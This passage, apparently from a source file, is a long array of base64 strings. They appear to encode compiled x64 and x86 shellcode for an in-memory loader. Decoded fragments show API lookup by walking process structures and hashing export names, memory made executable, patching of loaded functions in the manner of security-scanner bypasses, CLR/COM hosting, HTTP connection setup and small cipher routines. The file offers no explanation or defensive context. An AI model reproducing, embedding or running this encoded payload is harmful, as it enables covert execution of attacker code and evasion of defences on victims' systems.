	"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",
	"MF3DVUiJ5UiJTRBIiVUYuAAAAABdw1VIieVIiU0QSIlVGEyJRSC4AAAAAF3DVUiJ",
	"5UiJTRCJVRi4AAAAAF3DVUiJ5UiJTRC4AAAAAF3DVUiJ5UiJTRC4AAAAAF3DVUiJ",
	"5UiD7DBIiU0QSIlVGEiLRRhIiwBIjRWyAgAASIkQSItFGEiLAEiNFV0DAABIiVAI",
	"SItFGEiLAEiNFX0DAABIiVAQSItFGEiLAEiNFaQDAABIiVAYSItFGEiLAEiNFb0D",
	"AABIiVAgSItFGEiLAEiNFQYEAABIiVAoSItFGEiLAEiNFTcEAABIiVAwSItFGEiL",
	"AEiNFZkEAABIiVA4SItFGEiLAEiNFZoEAABIiVBASItFGEiLAEiNFZsEAABIiVBI",
	"SItFGEiLAEiNFZwEAABIiVBQSItFGEiLAEiNFZ0EAABIiVBYSItFGEiLAEiNFZ4E",
	"AABIiVBgSItFGEiLAEiNFaEEAABIiVBoSItFGEiLAEiNFdMEAABIiVBwSItFGEiL",
	"AEiNFdQEAABIiVB4SItFGEiLAEiNFdUEAABIiZCAAAAASItFGEiLAEiNFdMEAABI",
	"iZCIAAAASItFGEiLAEiNFdEEAABIiZCQAAAASItFGEiLAEiNFc8EAABIiZCYAAAA",
	"SItFGEiLAEiNFc0EAABIiZCgAAAASItFGEiLAEiNFcoEAABIiZCoAAAASItFGEiL",
	"AEiNFdAEAABIiZCwAAAASItFGEiLAEiNFc4EAABIiZC4AAAASItFGEiLAEiNFdQE",
	"AABIiZDAAAAASItFGEiLAEiNFdIEAABIiZDIAAAASItFGEiLAEiNFeoEAABIiZDQ",
	"AAAASItFGEiLAEiNFewEAABIiZDYAAAASItFGEiLAEiNFeoEAABIiZDgAAAASItF",
	"GEiLAEiNFegEAABIiZDoAAAASItFGMdAIAAAAABIi0UYSItVEEiJUChIi0UQSIuA",
	"wAAAAEiLVRhIg8IISItNEEiBwdwDAAD/0IlF/IN9/AB1MkiLRRhIi0AISIsASItA",
	"MEiLVRhMjUIQSItVEEyNiowEAABIi1UYSItKCEyJyv/QiUX8i0X8SIPEMF3DVUiJ",
	"5UiD7CBIiU0QSIlVGEyJRSBIg30gAHUKuANAAIDpkQAAAEiLRRBIi0AoSI2I/AMA",
	"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",
	"SIuFqAEAAEgB0Eg7hdABAAAPhnYBAABIi4XQAQAASImFcAEAAMeF3AEAAAAAAADr",
	"O4uV3AEAAEiLhXABAABIAdAPthCLhdwBAACIVAUgi5XcAQAASIuFcAEAAEgB0A+2",
	"ADwudCmDhdwBAAABi5XcAQAASIuFcAEAAEgB0A+2AITAdAyDvdwBAAA7dqXrAZCL",
	"hdwBAACDwAGJwMZEBSBki4XcAQAAg8ACicDGRAUgbIuF3AEAAIPAA4nAxkQFIGyL",
	"hdwBAACDwASJwMZEBSAAi4XcAQAAg8ABicBIAYVwAQAAx4XcAQAAAAAAAOski5Xc",
	"AQAASIuFcAEAAEgB0A+2EIuF3AEAAIhUBaCDhdwBAAABi5XcAQAASIuFcAEAAEgB",
	"0A+2AITAdAmDvdwBAAB+dryLhdwBAADGRAWgAEiLhfABAABIi0AwSI1VIEiJ0f/Q",
	"SImFaAEAAEiDvWgBAAAAdCFIi4XwAQAASItAOEiNVaBIi41oAQAA/9BIiYXQAQAA",
	"6wtIx4XQAQAAAAAAAEiLhdABAADrJYOt2AEAAAGDvdgBAAAAdA5Ig73QAQAAAA+E",
	"iv3//0iLhdABAABIgcRgAgAAXcNVSInlSIPsUEiJTRBIiVUYTIlFIEjHRfAAAAAA",
	"x0XcYAAAAItF3GVIiwBIiUXQSItF0EiJRehIi0XoSItAGEiJReBIi0XgSItAEEiJ",
	"RfjrMUiLRfhIi0AwSItNIEiLVRhJiclJidBIicJIi00Q6FD7//9IiUXwSItF+EiL",
	"AEiJRfhIi0X4SItAMEiFwHQHSIN98AB0u0iLRfBIg8RQXcNVSInlSIlNEEiJVRhE",
	"iUUgTIlNKEiLRTjHAAAAAAC4AAAAAF3DVUiJ5YlNEIlVGItFEA+vRRhdw1VIieVI",
	"iU0QSIlVGEyJRSBMiU0oSItFMMcAAAAAALgAAAAAXcNVSInliU0QiVUYi1UQi0UY",
	"AdBdw1VIieVIg+xASIlNEEiLRRBIi0AwSItVEEiBwjgDAABIidH/0EiJRfhIg334",
	"AHUKuAEAAADpZwEAAEiLRRBIi0A4SItVEEiBwqwDAABIi034/9BIiUXwSIN98AB1",
	"CrgAAAAA6TkBAABIjRVG////SI0FGv///0gpwkiJ0IlF7ItF7IXAeQq4AAAAAOkR",
	"AQAASItFEEiLQGCLVexMjUXoSItN8E2JwUG4QAAAAP/QhcB1CrgAAAAA6eUAAACL",
	"VexIi0XwSYnQSI0Vw/7//0iJwegnAwAASItFEEiLQGBEi0Xoi1XsTI1N5EiLTfD/",
	"0EiLRRBIi0A4SItVEEiBwrwDAABIi034/9BIiUXwSIN98AB1CrgAAAAA6YUAAABI",
	"jRXK/v//SI0Fnv7//0gpwkiJ0IlF7ItF7IXAeQe4AAAAAOtgSItFEEiLQGCLVexM",
	"jUXoSItN8E2JwUG4QAAAAP/QhcB1B7gAAAAA6zeLVexIi0XwSYnQSI0VTf7//0iJ",
	"weh5AgAASItFEEiLQGBEi0Xoi1XsTI1N5EiLTfD/0LgBAAAASIPEQF3DVUiJ5UiJ",
	"TRBIiVUYTIlFIESJTShIi0UgxwABAAAAuAAAAABdw1VIieWJTRCJVRiLRRArRRhd",
	"w1VIieVIiU0QSIlVGESJRSC4AAAAAF3DVUiJ5YlNEIlVGItFEJn3fRhdw1VIieVI",
	"g+xASIlNEEiLRRBIi0AwSItVEEiBwkwDAABIidH/0EiJRfhIg334AHUKuAEAAADp",
	"ZwEAAEiLRRBIi0A4SItVEEiBwlwDAABIi034/9BIiUXwSIN98AB1CrgAAAAA6TkB",
	"AABIjRV/////SI0FYf///0gpwkiJ0IlF7ItF7IXAeQq4AAAAAOkRAQAASItFEEiL",
	"QGCLVexMjUXoSItN8E2JwUG4QAAAAP/QhcB1CrgAAAAA6eUAAACLVexIi0XwSYnQ",
	"SI0VCv///0iJweggAQAASItFEEiLQGBEi0Xoi1XsTI1N5EiLTfD/0EiLRRBIi0A4",
	"SItVEEiBwnwDAABIi034/9BIiUXwSIN98AB1CrgAAAAA6YUAAABIjRWi/v//SI0F",
	"dv7//0gpwkiJ0IlF7ItF7IXAeQe4AAAAAOtgSItFEEiLQGCLVexMjUXoSItN8E2J",
	"wUG4QAAAAP/QhcB1B7gAAAAA6zeLVexIi0XwSYnQSI0VJf7//0iJwehyAAAASItF",
	"EEiLQGBEi0Xoi1XsTI1N5EiLTfD/0LgBAAAASIPEQF3DkJCQkJCQVUiJ5UiD7BBI",
	"iU0QiVUYTIlFIEiLRRBIiUX46xCLRRiJwkiLRfiIEEiDRfgBSItFIEiNUP9IiVUg",
	"SIXAdd9Ii0UQSIPEEF3DVUiJ5UiD7BBIiU0QSIlVGEyJRSBIi0UQSIlF+EiLRRhI",
	"iUXw6xdIi0XwD7YQSItF+IgQSINF+AFIg0XwAUiLRSBIjVD/SIlVIEiFwHXYSItF",
	"EEiDxBBdw1VWU0iJ5UiJTSBIiVUoTIlFMEiLXSBIi3Uo6zhIidhIjVgBD7YQSInw",
	"SI1wAQ+2ADjCdCBIjUP/D7YQSI1G/w+2ADjCcwe4/////+sduAEAAADrFkiLRTBI",
	"jVD/SIlVMEiFwHW3uAAAAABbXl3DkJBVSInlSIPsMEiJTRBIiVUYSItFGEiJRdjH",
	"RfwAAAAA6x+LRfxIjRSFAAAAAEiLRRBIAdCLEItF/IlUheCDRfwBg338A3bbx0X8",
	"AAAAAOtei0XYwcgIicKLRdwBwotF4DHQiUXYi0XcwcADicKLRdgx0IlF3ItF7IlF",
	"+ItF5MHICInCi0XgAdAzRfyJReyLReDBwAOJwotF7DHQiUXgi0XoiUXki0X4iUXo",
	"g0X8AYN9/Bp2nEiLRdhIg8QwXcNVSInlSIPsUEiJTRBIiVUYSItFEEiJReBIi0UY",
	"SIlF+MdF8AAAAADHRfQAAAAAx0XsAAAAAOnJAAAAi1X0SItF4EgB0A+2AITAdAaD",
	"ffRAdXO4EAAAACtF8InBSI1V0ItF8EgB0EmJyLoAAAAASInB6L79//+LRfDGRAXQ",
	"gIN98At2K0iLVfhIjUXQSInB6LD+//9IMUX4SI1F0EG4EAAAALoAAAAASInB6IX9",
	"//+LRfTB4AOJRdzHRfAQAAAAg0XsAesei1X0SItF4EgB0A+2AInCi0XwiFQF0INF",
	"8AGDRfQBg33wEHUbSItV+EiNRdBIicHoS/7//0gxRfjHRfAAAAAAg33sAA+ELf//",
	"/0iLRfhIg8RQXcOQkJCQkJCQkJCQkJBVSInlSIPsIEiJTRBIiVUYSItFGEiJRfBI",
	"i0UQSIlF6MdF/AAAAADrQotF/EiNFIUAAAAASItF8EgB0ItV/EiNDJUAAAAASItV",
	"8EgByosKi1X8TI0ElQAAAABIi1XoTAHCixIxyokQg0X8AYN9/AN2uMdF/AAAAADp",
	"HAEAAEiLRfCLEEiLRfBIg8AEiwABwkiLRfCJEEiLRfBIjVAESItF8EiDwASLAMHA",
	"BYnBSItF8IsAMciJAkiLRfBIg8AISItV8EiDwgiLCkiLVfBIg8IMixIByokQSItF",
	"8EiDwAxIi1XwSIPCDIsSidHBwQhIi1XwSIPCCIsSMcqJEEiLRfBIg8AISItV8EiD",
	"wgiLCkiLVfBIg8IEixIByokQSItF8IsAwcAQicJIi0XwSIPADIsAAcJIi0XwiRBI",
	"i0XwSI1QDEiLRfBIg8AMiwDBwA2JwUiLRfCLADHIiQJIi0XwSIPABEiLVfBIg8IE",
	"ixKJ0cHBB0iLVfBIg8IIixIxyokQSItF8EiDwAhIi1XwSIPCCIsSwcIQiRCDRfwB",
	"g338Dw+G2v7//8dF/AAAAADrQotF/EiNFIUAAAAASItF8EgB0ItV/EiNDJUAAAAA",
	"SItV8EgByosKi1X8TI0ElQAAAABIi1XoTAHCixIxyokQg0X8AYN9/AN2uJBIg8Qg",
	"XcNVSInlSIPsUEiJTRBIiVUYTIlFIEyJTShIi0UgSIlF+EiLRRhIiUXo6dQAAADH",
	"RfQAAAAA6x2LRfRIY9BIi0XoSAHQD7YQi0X0SJiIVAXQg0X0AYN99A9+3UiNRdBI",
	"icJIi00Q6Jz9//+4EAAAAEiDfSgQSA9GRSiJReTHRfQAAAAA6y+LRfRIY9BIi0X4",
	"SAHCi0X0SGPISItF+EgByA+2CItF9EiYD7ZEBdAxyIgCg0X0AYtF9DtF5HzJi0Xk",
	"SJhIKUUoi0XkSJhIAUX4x0X0EAAAAOsli0X0SJhIjVD/SItF6EgB0A+2EIPCAYgQ",
	"D7YAhMB0AusKg230AYN99AB/1UiDfSgAD4Uh////kEiDxFBdw5CQ//////////8A",
	"AAAAAAAAAP//////////AAAAAAAAAABaUVKD7CBTVVZXi3wkNP93LP93KP93TP93",
	"SFfo0RoAAP93LIvw/3co/3dU/3dQV+i9GgAAg8Qoi9iJXCQ0hfYPhBUCAACF2w+E",
	"DQIAAGoEaAAwAAD/N2oA/9aL8IX2D4T2AQAA/zdXVugXHQAAaiCNRCQgagBQ6C0d",
	"AACLBo2uMAIAAC0wAgAAUFWNRhRQjUYEUOjsGwAA/3YsjYYYBgAA/3YoUOi1GgAA",
	"g8Q0O4YYBwAAD4VPAQAAO5YcBwAAD4VDAQAA/3Ys/3Yo/3Y0/3YwVugbGgAAg8QU",
	"iUYwhcAPhHYBAAAz/zm+NAIAAHYWjZ44AgAAU/9WMEeDwyA7vjQCAABy8DPbQzld",
	"AHY0jW40jX44/3Ys/3Yo/3cE/zdW6M4ZAACDxBSJRQCFwA+E0gAAAEODxwiDxQQ7",
	"njACAABy0ouGDAUAAGoCWzvDdRVW6CkFAABZhcAPhKcAAACLhgwFAACNvkgHAACD",
	"+AF0Aos/g75AAwAAAXQmVugyAwAAWYXAdQg5nkADAAB0eFboBQQAAFmFwHUIOZ5A",
	"AwAAdGWDPwN0WYM/BHRUgz8BdCM5H3Qfgz8FdBKDPwZ0DYM/B3VDVujlFwAA6zpW",
	"6EwWAADrMo1EJBBQVujnDAAAWVmFwHQNjUQkEFBW6OEOAABZWY1EJBBQVuhdCAAA",
	"WesGVuiREQAAWYtcJDSDvgwFAAACvwDAAAB1LouGSAcAAIXAdCT/tkAHAABqAFDo",
	"exsAAIPEDFdqAP+2SAcAAP9WQIOmSAcAAAD/NmoAVuhbGwAAg8QMV2oAVv/TM8Dr",
	"A4PI/19eXVuDxCDDi0QkBIPABPD/AIsAwgQAM8DCCABVi+z2RRACVot1CFd0FYt9",
	"GIX/dBuLRhRQiwj/UQSLRhSJB/ZFEAF0GYt9FIX/dQe4A0AAgOsNg8YMVosG/1AE",
	"iTczwF9eXcIUAItEJASLQCj/UFSLTCQIiQEzwMIIAFZX6AgYAACLdCQQuRMUQAC/",
	"5CpAACvPA8iLBokI6O0XAAC5YhJAACvPA8iLBolIBOjaFwAAuXIUQAArzwPIiwaJ",
	"SAjoxxcAALnAEkAAK88DyIsGiUgM6LQXAAC5dhJAACvPA8iLBolIEOihFwAAuXES",
	"QAArzwPIiwaJSBTojhcAALkOFEAAK88DyIsGiUgY6HsXAAC5cRJAACvPA8iLBolI",
	"HOhoFwAAucMTQAArzwPIiwaJSCDoVRcAALm+E0AAK88DyIsGiUgk6EIXAAC5vhNA",
	"ACvPA8iLBl+JSCiLRCQIg2YEAIlGKF7DM8DCBABVi+yD7CwzwFZqIFCJRfSJRfiJ",
	"RfyNRdRQ6MQZAACLdQyNTdSDxAyLBlFW/1AMhcB1EosGjU38UY1N+FGNTfRRVv9Q",
	"EDPAXsnCCAAzwMIMAItMJAyFyXUHuANAAIDrTVOLXCQMM9JWi3QkDFeLfiiLhJf8",
	"AwAAOwSTdQhCg/oEde7rFDPSi4SXrAQAADsEk3UQQoP6BHXuiTHw/0YEM8DrCIMh",
	"ALgCQACAX15bwgwAi0wkBIPI//APwUEESMIEAItEJBiDIAAzwMIYAItEJAQPr0Qk",
	"CMOLRCQUgyAAM8DCFACLRCQEA0QkCMNRU1aLdCQQjYY4AwAAUP9WMIvYhdt1BkDp",
	"xQAAAFVXjYasAwAAUFP/VjSL6IXtD4SqAAAAv44UQACB74IUQAAPiJkAAACNRCQY",
	"UGpAV1X/VkiFwA+EhQAAAFfo2BUAALmCFEAAgenkKkAAA8FQVehhGAAAg8QMjUQk",
	"EFD/dCQcV1X/VkiNhrwDAABQU/9WNIvohe10Sb+kFEAAu5gUQAAr+3g7jUQkGFBq",
	"QFdV/1ZIhcB0K1fofhUAAIHr5CpAAAPDUFXoDBgAAIPEDI1EJBBQ/3QkHFdV/1ZI",
	"M8BA6wIzwF9dXltZw1FTVot0JBCNhkwDAABQ/1Ywi9iF23UGQOnFAAAAVVeNhlwD",
	"AABQU/9WNIvohe0PhKoAAAC/2ipAAIHvDhRAAA+ImQAAAI1EJBhQakBXVf9WSIXA",
	"D4SFAAAAV+jyFAAAuQ4UQACB6eQqQAADwVBV6HsXAACDxAyNRCQQUP90JBxXVf9W",
	"SI2GfAMAAFBT/1Y0i+iF7XRJv9EqQAC7wipAACv7eDuNRCQYUGpAV1X/VkiFwHQr",
	"V+iYFAAAgevkKkAAA8NQVegmFwAAg8QMjUQkEFD/dCQcV1X/VkgzwEDrAjPAX11e",
	"W1nDgexYAgAAU1ZXajxfM/aNRCQoV1ZQiXQkILsAAmCE6AkXAACNRCRwiXwkNIu8",
	"JHQCAACDxAyJRCQ4jYQkZAEAAIlEJFS4AAEAAIlEJDyJRCRYjUQkKFBoAAAAEFaN",
	"hxAFAABQ/1d8hcAPhLQBAAAzwIN8JDQEVlYPlMBWiUQkHLgAMuCEVlYPRNj/l4AA",
	"AACLyIlMJCSFyQ+EhQEAADl0JBC6uwEAAFZWagNWVmpQWA9Fwg+3wFCNRCR8UFH/",
	"l4QAAACLyIlMJCCFyQ+E+wAAAFVWU1ZWVo2EJHwBAABQjYcQBgAAUFH/l5QAAACL",
